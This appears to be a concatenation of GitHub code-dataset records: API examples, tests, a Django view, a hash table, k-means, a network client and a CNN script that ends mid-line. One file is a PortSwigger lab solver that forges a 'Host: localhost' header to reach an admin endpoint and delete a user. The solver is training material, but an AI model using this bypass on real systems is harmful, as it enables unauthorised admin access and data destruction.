you'd persist this token somewhere\n os.environ['ASANA_TOKEN'] = json.dumps(token) # (see below)\n\n if not client or not client.session.authorized:\n print(\"COULD NOT AUTHORIZE\")\n exit(1)\n\n # Summarize the project.\n summarize(client, args.project_to_summarize, args.summary_project)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Asana/python-asana","sub_path":"examples/example-summary-task.py","file_name":"example-summary-task.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":281,"dataset":"github-code","pt":"6"} +{"seq_id":"72532827709","text":"# pylint:disable=unused-variable\n# pylint:disable=unused-argument\n# pylint:disable=redefined-outer-name\n# pylint:disable=no-value-for-parameter\n# pylint:disable=too-many-arguments\n\nimport json\nimport logging\nfrom typing import Any, AsyncIterator, Awaitable, Callable, Iterator\nfrom unittest import mock\n\nimport aiopg.sa\nimport pytest\nimport sqlalchemy as sa\nfrom aiohttp.test_utils import TestClient\nfrom faker import Faker\nfrom models_library.projects import ProjectAtDB, ProjectID\nfrom pytest_mock.plugin import MockerFixture\nfrom pytest_simcore.helpers.utils_login import UserInfoDict\nfrom servicelib.aiohttp.application_keys import APP_DB_ENGINE_KEY\nfrom simcore_postgres_database.models.comp_pipeline import StateType\nfrom simcore_postgres_database.models.comp_tasks import NodeClass, comp_tasks\nfrom simcore_postgres_database.models.users import UserRole\nfrom simcore_service_webserver.db_listener._db_comp_tasks_listening_task import (\n create_comp_tasks_listening_task,\n)\nfrom tenacity._asyncio import AsyncRetrying\nfrom tenacity.before_sleep import before_sleep_log\nfrom tenacity.retry import retry_if_exception_type\nfrom tenacity.stop import stop_after_delay\nfrom tenacity.wait import wait_fixed\n\nlogger = logging.getLogger(__name__)\n\n\n@pytest.fixture\nasync def mock_project_subsystem(\n mocker: MockerFixture,\n) -> AsyncIterator[dict[str, mock.MagicMock]]:\n mocked_project_calls = {}\n\n mocked_project_calls[\"update_node_outputs\"] = mocker.patch(\n \"simcore_service_webserver.db_listener._db_comp_tasks_listening_task.update_node_outputs\",\n return_value=\"\",\n )\n\n mocked_project_calls[\"_get_project_owner\"] = mocker.patch(\n \"simcore_service_webserver.db_listener._db_comp_tasks_listening_task._get_project_owner\",\n return_value=\"\",\n )\n mocked_project_calls[\"_update_project_state\"] = mocker.patch(\n \"simcore_service_webserver.db_listener._db_comp_tasks_listening_task._update_project_state\",\n return_value=\"\",\n )\n\n yield mocked_project_calls\n\n\n@pytest.fixture\nasync def comp_task_listening_task(\n mock_project_subsystem: dict, client: TestClient\n) -> AsyncIterator:\n assert client.app\n async for _comp_task in create_comp_tasks_listening_task(client.app):\n # first call creates the task, second call cleans it\n yield\n\n\n@pytest.fixture\ndef comp_task(\n postgres_db: sa.engine.Engine,\n) -> Iterator[Callable[..., dict[str, Any]]]:\n created_task_ids: list[int] = []\n\n def creator(project_id: ProjectID, **task_kwargs) -> dict[str, Any]:\n task_config = {\"project_id\": f\"{project_id}\"} | task_kwargs\n with postgres_db.connect() as conn:\n result = conn.execute(\n comp_tasks.insert()\n .values(**task_config)\n .returning(sa.literal_column(\"*\"))\n )\n new_task = result.first()\n assert new_task\n new_task = dict(new_task)\n created_task_ids.append(new_task[\"task_id\"])\n return new_task\n\n yield creator\n\n # cleanup\n with postgres_db.connect() as conn:\n conn.execute(\n comp_tasks.delete().where(comp_tasks.c.task_id.in_(created_task_ids))\n )\n\n\n@pytest.mark.parametrize(\n \"task_class\", [NodeClass.COMPUTATIONAL, NodeClass.INTERACTIVE, NodeClass.FRONTEND]\n)\n@pytest.mark.parametrize(\n \"update_values, expected_calls\",\n [\n pytest.param(\n {\n \"outputs\": {\"some new stuff\": \"it is new\"},\n },\n [\"_get_project_owner\", \"update_node_outputs\"],\n id=\"new output shall trigger\",\n ),\n pytest.param(\n {\"state\": StateType.ABORTED},\n [\"_get_project_owner\", \"_update_project_state\"],\n id=\"new state shall trigger\",\n ),\n pytest.param(\n {\"outputs\": {\"some new stuff\": \"it is new\"}, \"state\": StateType.ABORTED},\n [\"_get_project_owner\", \"update_node_outputs\", \"_update_project_state\"],\n id=\"new output and state shall double trigger\",\n ),\n pytest.param(\n {\"inputs\": {\"should not trigger\": \"right?\"}},\n [],\n id=\"no new output or state shall not trigger\",\n ),\n ],\n)\n@pytest.mark.parametrize(\"user_role\", [UserRole.USER])\nasync def test_listen_comp_tasks_task(\n mock_project_subsystem: dict,\n logged_user: UserInfoDict,\n project: Callable[..., Awaitable[ProjectAtDB]],\n pipeline: Callable[..., dict[str, Any]],\n comp_task: Callable[..., dict[str, Any]],\n comp_task_listening_task: None,\n client,\n update_values: dict[str, Any],\n expected_calls: list[str],\n task_class: NodeClass,\n faker: Faker,\n):\n db_engine: aiopg.sa.Engine = client.app[APP_DB_ENGINE_KEY]\n some_project = await project(logged_user)\n pipeline(project_id=f\"{some_project.uuid}\")\n task = comp_task(\n project_id=f\"{some_project.uuid}\",\n node_id=faker.uuid4(),\n outputs=json.dumps({}),\n node_class=task_class,\n )\n async with db_engine.acquire() as conn:\n # let's update some values\n await conn.execute(\n comp_tasks.update()\n .values(**update_values)\n .where(comp_tasks.c.task_id == task[\"task_id\"])\n )\n\n # tests whether listener gets executed\n for call_name, mocked_call in mock_project_subsystem.items():\n if call_name in expected_calls:\n async for attempt in AsyncRetrying(\n wait=wait_fixed(1),\n stop=stop_after_delay(10),\n retry=retry_if_exception_type(AssertionError),\n before_sleep=before_sleep_log(logger, logging.INFO),\n reraise=True,\n ):\n with attempt:\n mocked_call.assert_awaited()\n\n else:\n mocked_call.assert_not_called()\n","repo_name":"ITISFoundation/osparc-simcore","sub_path":"services/web/server/tests/unit/with_dbs/01/notifications/test_notifications__db_comp_tasks_listening_task.py","file_name":"test_notifications__db_comp_tasks_listening_task.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"6"} +{"seq_id":"17523043430","text":"def run():\n ###### 0123456789012345678901234567890123456789012345678'\n record = '....................100 .......513.25 ..........'\n\n # Old Code\n cost = int(record[20:23]) * float(record[31:37])\n print(cost)\n\n # New Code\n SHARES = slice(20, 23)\n PRICE = slice(31, 37)\n cost = int(record[SHARES]) * float(record[PRICE])\n print(cost)\n\n\nif __name__ == '__main__':\n \"\"\"\n Problem: Program has become unreadable and you want to\n clean it up.\n \n Notes: This cleans the code up and makes it more clear as\n to what chunk of the data is.\n \"\"\"\n run()\n","repo_name":"nplutt/learning","sub_path":"python_cookbook/chapter_1/naming_a_slice.py","file_name":"naming_a_slice.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24466797036","text":"from django.contrib.auth import logout\nfrom django.shortcuts import render, redirect\nfrom .forms import PetForm\nfrom django.contrib.auth.models import User\n\n\n# Create your views here.\ndef addPet(request):\n\tprint(request.user)\n\tif request.method == 'POST':\n\t\tform = PetForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tpetToAdd = form.save(commit=False)\n\t\t\tpetToAdd.user = request.user\n\t\t\tpetToAdd.save()\n\t\t\treturn redirect('profileManager:profile')\n\telse:\n\t\tform = PetForm()\n\tcontext = {'form': form}\n\treturn render(request, 'app/petManager/addPet.html', context)\n","repo_name":"WSU-4110/Pet-Finder","sub_path":"petManager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"75101345466","text":"import csv\nf = open(\"C:\\\\Users\\\\User\\Desktop\\WORK\\데이터분석\\DATA\\subwayfee.csv\", encoding = \"cp949\")\ndata = csv.reader(f)\nnext(data)\n\nmx = 0\nrate = 0\n\nfor row in data:\n for i in range(4, 8):\n row[i] = int(row[i])\n if row[6] != 0:\n rate = row[4] / row[6]\n if rate > mx :\n mx = rate\nprint(mx)","repo_name":"dasfef/Chungbuk_Univ_BigData","sub_path":"day03/day03_subwayfee.py","file_name":"day03_subwayfee.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1584376551","text":"import unittest\nimport sys\nimport time\nimport os\n\n\ndef target():\n time.sleep(0.5)\n\n\nclass TestThreadNames(unittest.TestCase):\n def setUp(self):\n try:\n del sys.modules[\"threading\"]\n except KeyError:\n pass\n\n def test_unpatched(self):\n import threading\n self.assertFalse(hasattr(threading.Thread.start, \"_namedthreads_patched\"))\n thread = threading.Thread(target=target, name=\"mysupersleepythread\")\n thread.start()\n # wait_for_thread(thread)\n thread_status = get_thread_status()\n self.assertNotIn(\"mysupersleepythread\", thread_status)\n thread.join()\n\n def test_patched(self):\n import namedthreads\n self.assertTrue(namedthreads.patch())\n\n import threading\n\n self.assertTrue(hasattr(threading.Thread.start, \"_namedthreads_patched\"))\n thread = threading.Thread(target=target, name=\"mysupersleepythread\")\n thread.start()\n # wait_for_thread(thread)\n thread_status = get_thread_status()\n self.assertNotIn(\"mysupersleepythread\", thread_status)\n self.assertIn(\"mysupersleepyth\", thread_status)\n thread.join()\n \n\ndef get_thread_status():\n s_pid = str(os.getpid())\n thread_id = int(list(p for p in os.listdir(\"/proc/{}/task\".format(s_pid)) if p != s_pid)[0])\n with open(\"/proc/{}/task/{}/status\".format(s_pid, thread_id), mode=\"r\") as f:\n return f.read()\n\n\ndef wait_for_thread(thread_obj):\n for i in range(10):\n if thread_obj.is_alive():\n return\n time.sleep(0.1)\n assert False\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"beniwohli/namedthreads","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"24295363215","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 11 11:30:12 2022\r\n\r\n@author: 253364\r\n\"\"\"\r\n\r\nimport random\r\n\r\nclass Target():\r\n \r\n def __init__(self,x, y, width, height):\r\n self.x = x\r\n self.y = y \r\n self.width = width\r\n self.height = height\r\n self.hitbox = (self.x, self.y, self.width, self.height)\r\n \r\n \r\n ","repo_name":"sliverpool555/Biods-Project","sub_path":"Target.py","file_name":"Target.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38036727876","text":"#!/usr/bin/env python3\r\n# Host header authentication bypass\r\n# Lab-Link: https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass\r\n# Difficulty: APPRENTICE\r\nimport requests\r\nimport sys\r\nimport time\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n\r\n\r\ndef delete_user(client, host, username):\r\n url = f'{host}/admin/delete?username={username}'\r\n\r\n # Use a prepared request to keep the cookie values and just replace the host header\r\n req = requests.Request('GET', url)\r\n prep = client.prepare_request(req)\r\n prep.headers['Host'] = 'localhost'\r\n r = client.send(prep, allow_redirects=False)\r\n return r.status_code == 302\r\n\r\n\r\ndef main():\r\n print('[+] Host header authentication bypass')\r\n try:\r\n host = sys.argv[1].strip().rstrip('/')\r\n except IndexError:\r\n print(f'Usage: {sys.argv[0]} ')\r\n print(f'Exampe: {sys.argv[0]} http://www.example.com')\r\n sys.exit(-1)\r\n\r\n with requests.Session() as client:\r\n client.verify = False\r\n client.proxies = proxies\r\n\r\n # Get the cookies required\r\n client.get(host)\r\n\r\n username = 'carlos'\r\n if not delete_user(client, host, username):\r\n print(f'[-] Failed to delete user {username}')\r\n sys.exit(-5)\r\n print(f'[+] Deleting of {username} appears successful')\r\n\r\n # I had some times issues getting the proper result, so wait briefly before checking\r\n time.sleep(2)\r\n if 'Congratulations, you solved the lab!' not in client.get(f'{host}').text:\r\n print(f'[-] Failed to solve lab')\r\n sys.exit(-9)\r\n\r\n print(f'[+] Lab solved')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"frank-leitner/portswigger-websecurity-academy","sub_path":"20_HTTP_host_header_attacks/Host_header_authentication_bypass/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"6"} +{"seq_id":"36285648166","text":"# prediction\nimport os\nimport json\nimport http\nfrom sklearn.externals import joblib\n\nclf = joblib.load(os.path.join(os.environ.get('ABEJA_TRAINING_RESULT_DIR', '.'), 'model.pkl'))\nprint(clf)\n\n\ndef decode_predictions(result):\n categories = {\n 0: 'False',\n 1: 'True',\n }\n result_with_labels = [{\"toxic\": categories[i], \"probability\": score} for i, score in enumerate(result)]\n return sorted(result_with_labels, key=lambda x: x['probability'], reverse=True)\n\n\ndef handler(request, context):\n req_data = json.load(request)\n print(req_data)\n comment = req_data['comment']\n print(comment)\n result = clf.predict_proba([comment])[0]\n print(result)\n sorted_result = decode_predictions(result.tolist())\n\n return {\n 'status_code': http.HTTPStatus.OK,\n 'content_type': 'application/json; charset=utf8',\n 'content': {\"result\": sorted_result}\n }\n","repo_name":"abeja-inc/Platform_handson","sub_path":"toxic_comment_classification/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42307353121","text":"import psutil\nimport sys\n\nclass HashTable:\n def __init__(self):\n self.buckets = 8\n self.initStorage()\n self.size = 0\n self.shouldResize = True\n self.total = 0\n self.max = 0\n self.mostCommon = ''\n\n def initStorage(self):\n self.storage = []\n for i in range(self.buckets):\n self.storage.append([])\n \n def hash(self, key, buckets):\n hash = 5381\n for i in range(len(key)):\n char = ord(key[i])\n hash = ((hash * 32) + hash) + char\n return hash % buckets\n\n def insertAndUpdateCounts(self, key):\n self.insert(key, 1)\n self.total += 1\n count = self.getCount(key)\n if count > self.max:\n self.max = count\n self.mostCommon = key\n\n def insert(self, key, value):\n index = self.hash(key, self.buckets)\n chain = self.storage[index]\n for i in range(len(chain)):\n if chain[i][0] == key:\n chain[i][1] += value\n return\n if psutil.virtual_memory().available < sys.getsizeof([key, value]):\n raise MemoryError('Not enough memory to add ' + key)\n chain.append([key, value])\n self.size += 1\n if self.shouldResize:\n self.resize()\n\n def getCount(self, key):\n index = self.hash(key, self.buckets)\n chain = self.storage[index]\n for i in range(len(chain)):\n if chain[i][0] == key:\n return chain[i][1]\n return None\n\n def resize(self):\n loadFactor = self.size / self.buckets\n if loadFactor >= 0.75 and sys.getsizeof(self.storage) * 4 < psutil.virtual_memory().available:\n self.shouldResize = False\n localStorage = []\n self.deepCopy(self.storage, localStorage)\n self.buckets *= 2\n self.initStorage()\n self.size = 0\n self.rehash(localStorage)\n self.shouldResize = True\n\n def deepCopy(self, globalStorage, localStorage):\n for i in range(len(globalStorage)):\n localStorage.append([])\n chain = globalStorage[i]\n for j in range(len(chain)):\n localStorage[i].append([chain[j][0], chain[j][1]])\n\n def rehash(self, localStorage):\n for i in range(len(localStorage)):\n chain = localStorage[i]\n for j in range(len(chain)):\n self.insert(chain[j][0], chain[j][1])","repo_name":"JohnLeMieux/IDbyDNA","sub_path":"hashTable.py","file_name":"hashTable.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72143002748","text":"import numpy as np\nimport pandas as pd\n\nimport random\n# this is a basic implementation fo k_means algorithm\n\nclass KMeans():\n def __init__(self, n_classes, logger=None, init_method='random', max_iter=10):\n # set logger object, should be logging protocol compliant\n self.logger = logger\n self.n_classes = n_classes\n self.max_iter = max_iter\n # initialize centroids based on init_method\n self.init_method = init_method\n\n def fit(self, train_data, train_labels=None):\n '''\n train model based on the init method and the train data.\n Will iterate over dataset for [max_iters]\n if logger provided => will output iteration values\n Params:\n - train_data: numpy array of (n_obs, variables)\n - train_labels: None (api consistency)\n '''\n possible_labels = [i for i in range(self.n_classes)]\n self.space_dim = train_data.shape[1]\n classification = []\n self.centroids = []\n # init labels\n for entry in train_data:\n label = random.choice(possible_labels)\n classification.append((entry, label))\n\n # interate util convergance or max iterations\n epoch = 0\n prev_classification = None\n while not self._check_converge(prev_classification, classification) and epoch < self.max_iter:\n self.logger.info('[Training] epoch: {}'.format(epoch))\n self.centroids = []\n prev_classification = classification.copy()\n classification = []\n\n for label in possible_labels:\n centroid = self._calculate_centroid(prev_classification, label)\n self.centroids.append((label, centroid))\n for entry in train_data:\n new_label = self._classify_obs(entry, self.centroids)\n classification.append((entry, new_label))\n epoch += 1\n\n self.logger.info('[Training] Done training, enjoy model predicitons!')\n\n def predict(self, data):\n '''\n Predict classification for dataset\n Params:\n - data: numpy array of shape (None, space_dim). Where space_dim is the same dim as training data\n\n Returns:\n - numpy array with given classificaitons in same order as data\n '''\n predictions = []\n for entry in data:\n pred = self._classify_obs(entry, self.centroids)\n predictions.append(pred)\n\n return np.array(predictions)\n\n def _calculate_centroid(self, observations, label):\n '''\n calculate the centroid for a label given observations\n Params:\n - observations: list of tuples (entry, label)\n - label: the current label for which a centroid should be calcualted\n\n Returns:\n - a list of size len(entry) representing a coordinate in the given space\n '''\n # centroid is the mean value of all points\n centroid = np.zeros(self.space_dim)\n amount_of_entries = 0\n\n for entry, current_label in observations:\n if current_label == label:\n centroid += entry\n amount_of_entries += 1\n\n if amount_of_entries > 0:\n centroid /= amount_of_entries\n return centroid\n\n def _classify_obs(self, entry, centroids):\n '''\n Classify an entry given all centroid by least ecludean distance to each one\n Params:\n - entry: array like object\n - centroids: list of tuples (label, point). Where point is an array\n like objects representing points in the same space as entry\n\n Returns\n - entroid\n '''\n disntaces_tuples = []\n for label, point in centroids:\n # numpy norm is l2, that's why this is the same as eucledean distance\n distance = np.linalg.norm(entry - point)\n disntaces_tuples.append((distance, label))\n min_tuple = min(disntaces_tuples, key = lambda t: t[0])\n return min_tuple[1]\n\n\n def _check_converge(self, prev_classification, new_classification):\n '''\n Checks if both classification are equals\n Params:\n - prev_classification: list of tuples (entry, label)\n - new_classification: list of tuples (entry, label)\n Rturns:\n - bool: true if both lists are equals flase if not\n '''\n if prev_classification == None or new_classification == None:\n return False\n\n for idx in range(len(prev_classification)):\n entry, prev_label = prev_classification[idx]\n entry, new_label = new_classification[idx]\n if prev_label != new_label:\n return False\n\n return True\n","repo_name":"levensworth/unsupervised_tp","sub_path":"models/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30043941644","text":"import socket\nimport sctp\nimport threading\nimport time\n\n\ndef send_command(address):\n print(\"Iniciando conexao com servidor: \" + address)\n if protocol == 'udp':\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\n sock.sendto(command.encode('utf-8'), (address, port))\n if command == 'run':\n data, address = sock.recvfrom(4096)\n print(data.decode('utf-8'))\n if command == 'test':\n for i in range(1, 10000):\n sock.sendto(str.encode(str(i)), (address, port))\n last = \"fim\"\n sock.sendto(last.encode('utf-8'), (address, port))\n elif protocol == 'tcp':\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((address, port))\n sock.send(str.encode(command))\n if command == 'run':\n print(\"Aguardando resposta...\")\n data = sock.recv(4096)\n print(data.decode('utf-8'))\n elif command == 'test':\n for i in range(1, 10000):\n sock.send(str.encode(str(i)))\n time.sleep(0.005)\n last = \"fim\"\n sock.send(str.encode(last))\n elif protocol == 'sctp':\n sock = sctp.sctpsocket_tcp(socket.AF_INET)\n sock.connect((address, port))\n sock.sctp_send(command)\n if command == 'run':\n print(\"Aguardando resposta...\")\n data = sock.recv(4096)\n print(data.decode('utf-8'))\n elif command == 'test':\n for i in range(1, 10000):\n sock.send(str.encode(str(i)))\n last = \"fim\"\n sock.send(str.encode(last))\n sock.close()\n\n\ndef call_thread(serverList):\n for addresses in serverList:\n thread = threading.Thread(target=send_command, args=(addresses,))\n threads.append(thread)\n thread.start()\n\n\nport = 4444\nthreads = list()\nlistaServidores = list()\nprotocol = 'udp'\nopcao = \"\"\n\nprint(\"\\n[1] Adicionar servidor\\n\"\n \"[2] Remover servidor\\n\"\n \"[3] Mostrar lista de servidores\\n\"\n \"[4] Enviar comando para lista de servidores\\n\"\n \"[5] Selecionar protocolo\\n\"\n \"[6] Sair\\n\")\n\nwhile (opcao != \"6\"):\n opcao = input(\"\\nDigite uma opcao: \")\n if (opcao == \"1\"):\n sv = input(\"Digite o endereço do servidor: \")\n listaServidores.append(sv)\n elif (opcao == \"2\"):\n sv = input(\"Digite o endereço do servidor para remover: \")\n listaServidores.remove(sv)\n elif (opcao == \"3\"):\n print(listaServidores)\n elif (opcao == \"4\"):\n command = input(\"Digite o comando: \")\n i = time.time()\n call_thread(listaServidores)\n for index, thread in enumerate(threads):\n thread.join()\n f = time.time()\n if command == \"test\":\n print(f\"O protocolo {protocol} levou {(f - i):.2f} segundos\")\n elif (opcao == \"5\"):\n new = \"\"\n while new.lower() not in ('udp', 'tcp', 'sctp'):\n new = input(\"Digite o protocolo desejado (UDP, TCP ou SCTP): \").lower()\n protocol = new\n print(\"Protocolo alterado: \" + protocol)\n","repo_name":"guilherme-poleto/Redes-de-computadores","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28184207519","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nimport pdb\nimport random\n\n\n__all__ = ['densenet']\n\n\nfrom torch.autograd import Variable\n\nclass Bottleneck(nn.Module):\n def __init__(self, inplanes, expansion=4, growthRate=12, dropRate=0):\n super(Bottleneck, self).__init__()\n planes = expansion * growthRate\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, growthRate, kernel_size=3, \n padding=1, bias=False)\n self.relu = nn.ReLU(inplace=True)\n self.dropRate = dropRate\n\n def forward(self, x):\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n if self.dropRate > 0:\n out = F.dropout(out, p=self.dropRate, training=self.training)\n\n out = torch.cat((x, out), 1)\n\n return out\n\n\nclass BasicBlock(nn.Module):\n def __init__(self, inplanes, expansion=1, growthRate=12, dropRate=0):\n super(BasicBlock, self).__init__()\n planes = expansion * growthRate\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.conv1 = nn.Conv2d(inplanes, growthRate, kernel_size=3, \n padding=1, bias=False)\n self.relu = nn.ReLU(inplace=True)\n self.dropRate = dropRate\n\n def forward(self, x):\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n if self.dropRate > 0:\n out = F.dropout(out, p=self.dropRate, training=self.training)\n\n out = torch.cat((x, out), 1)\n\n return out\n\n\nclass Transition(nn.Module):\n def __init__(self, inplanes, outplanes):\n super(Transition, self).__init__()\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.conv1 = nn.Conv2d(inplanes, outplanes, kernel_size=1,\n bias=False)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n out = F.avg_pool2d(out, 2)\n return out\n\n\nclass DenseNet(nn.Module):\n\n def __init__(self, depth=22, block=Bottleneck, \n dropRate=0, num_classes=10, growthRate=12, compressionRate=2):\n super(DenseNet, self).__init__()\n\n assert (depth - 4) % 3 == 0, 'depth should be 3n+4'\n n = (depth - 4) / 3 if block == BasicBlock else (depth - 4) // 6\n\n self.growthRate = growthRate\n self.dropRate = dropRate\n\n # self.inplanes is a global variable used across multiple\n # helper functions\n self.inplanes = growthRate * 2 \n self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, padding=1,\n bias=False)\n self.dense1 = self._make_denseblock(block, n)\n self.trans1 = self._make_transition(compressionRate)\n self.dense2 = self._make_denseblock(block, n)\n self.trans2 = self._make_transition(compressionRate)\n self.dense3 = self._make_denseblock(block, n)\n self.bn = nn.BatchNorm2d(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.avgpool = nn.AvgPool2d(8)\n self.fc = nn.Linear(self.inplanes, num_classes)\n self.base = torch.nn.Parameter(torch.randn(200, self.inplanes))\n\n # Weight initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def _make_denseblock(self, block, blocks):\n layers = []\n for i in range(blocks):\n # Currently we fix the expansion ratio as the default value\n layers.append(block(self.inplanes, growthRate=self.growthRate, dropRate=self.dropRate))\n self.inplanes += self.growthRate\n\n return nn.Sequential(*layers)\n\n def _make_transition(self, compressionRate):\n inplanes = self.inplanes\n outplanes = int(math.floor(self.inplanes // compressionRate))\n self.inplanes = outplanes\n return Transition(inplanes, outplanes)\n\n\n def forward(self, x):\n x = self.conv1(x)\n\n x = self.trans1(self.dense1(x)) \n x = self.trans2(self.dense2(x)) \n x = self.dense3(x)\n x = self.bn(x)\n x = self.relu(x)\n\n x = self.avgpool(x)\n x = x.view(x.size(0), -1)\n \n score = torch.mm( x, self.base.transpose(0, 1) )\n s1, s20 = torch.sort(score, 1)\n s1 = s1[:, -20:]\n s2 = s20[:, -20:]\n \n #s2 = s2.transpose(0, 1).unsqueeze(1)\n #s2 = list(s2)\n #random.shuffle(s2)\n #s2 = torch.cat(s2, 0).transpose(0, 1)\n \n #pdb.set_trace()\n s1 = torch.softmax(s1, 1)\n s1 = s1.unsqueeze(2).repeat(1, 1, self.inplanes)\n #pdb.set_trace()\n zero = torch.zeros(s2.size(0), 20, 200).cuda()\n zero.scatter_(2, s2.unsqueeze(2).long(), 1)\n zero = zero.reshape(-1, 200)\n get = torch.mm(zero, self.base)\n get = get.reshape(x.size(0), -1, self.base.size(1))\n #get = get[:, :, :100]\n #get = get.reshape(get.size(0), -1)\n get = torch.sum(s1 * get, 1)\n #x = self.fc(get)\n #pdb.set_trace()\n \n return x\n\n\ndef densenet(**kwargs):\n \"\"\"\n Constructs a ResNet model.\n \"\"\"\n return DenseNet(**kwargs)\n","repo_name":"morning-dews/PCL","sub_path":"pt_imagenet/dmodels/cifar/densenet.py","file_name":"densenet.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"71434010748","text":"# Convolutional Neural Network\n\n# Installing Theano\n# pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git\n\n# Installing Tensorflow\n# pip install tensorflow\n\n# Installing Keras\n# pip install --upgrade keras\n\n# Part 1 - Building the CNN\n\n# Importing the Keras libraries and packages\nimport tensorflow as tf\nsess = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\nfrom tensorflow.contrib.keras.api.keras.callbacks import Callback\n\nclass LossHistory(Callback):\n def __init__(self):\n super().__init__()\n self.epoch_id = 0\n self.losses = ''\n \n def on_epoch_end(self, epoch, logs={}):\n self.losses += \"Epoch {}: accuracy -> {:.4f}, val_accuracy -> {:.4f}\\n\"\\\n .format(str(self.epoch_id), logs.get('acc'), logs.get('val_acc'))\n self.epoch_id += 1\n \n def on_train_begin(self, logs={}):\n self.losses += 'Training begins...\\n'\n\nclassifier = Sequential()\n\n#Adding convulution\nclassifier.add(Convolution2D(32,(3,3),input_shape=(64,64,3), activation='relu'))\n#Max Pooling Step,\nclassifier.add(MaxPooling2D(pool_size = (2,2)))\n\n#Add another convulutional layer to further increase accuracy\nclassifier.add(Convolution2D(32,(3,3), activation='relu'))\n#Max Pooling Step,\nclassifier.add(MaxPooling2D(pool_size = (2,2)))\n#Flattening step\nclassifier.add(Flatten())\n#Step 4 Fully Connect\nclassifier.add(Dense(activation='relu', units = 128))\n#One node expects dog or cat on this layer \nclassifier.add(Dense(activation='sigmoid', units = 1 ))\n\n#Compile the cnn\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n#Image preprocessing\nfrom keras.preprocessing.image import ImageDataGenerator\nbatch_size = 256\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntraining_set = train_datagen.flow_from_directory(\n 'dataset/training_set',\n target_size=(64, 64),\n batch_size=batch_size,\n class_mode='binary')\n\ntest_set = test_datagen.flow_from_directory(\n 'dataset/test_set',\n target_size=(64, 64),\n batch_size=batch_size,\n class_mode='binary')\n\nimport tensorflow as tf\nhistory = LossHistory()\n\nwith tf.device('/gpu:1'):\n classifier.fit_generator(training_set,\n steps_per_epoch=8000/batch_size,\n epochs=90,\n validation_data=test_set,\n validation_steps=2000/batch_size,\n workers=8,\n# max_q_size=300,\n callbacks=[history])\n\nimport numpy as np\nfrom keras.preprocessing import image\n\ntest_image = image.load_img('dataset/single_prediction/6.jpg', target_size=(64, 64))\ntest_image = image.img_to_array(test_image)\ntest_image = np.expand_dims(test_image,axis=0)\n\nresult = 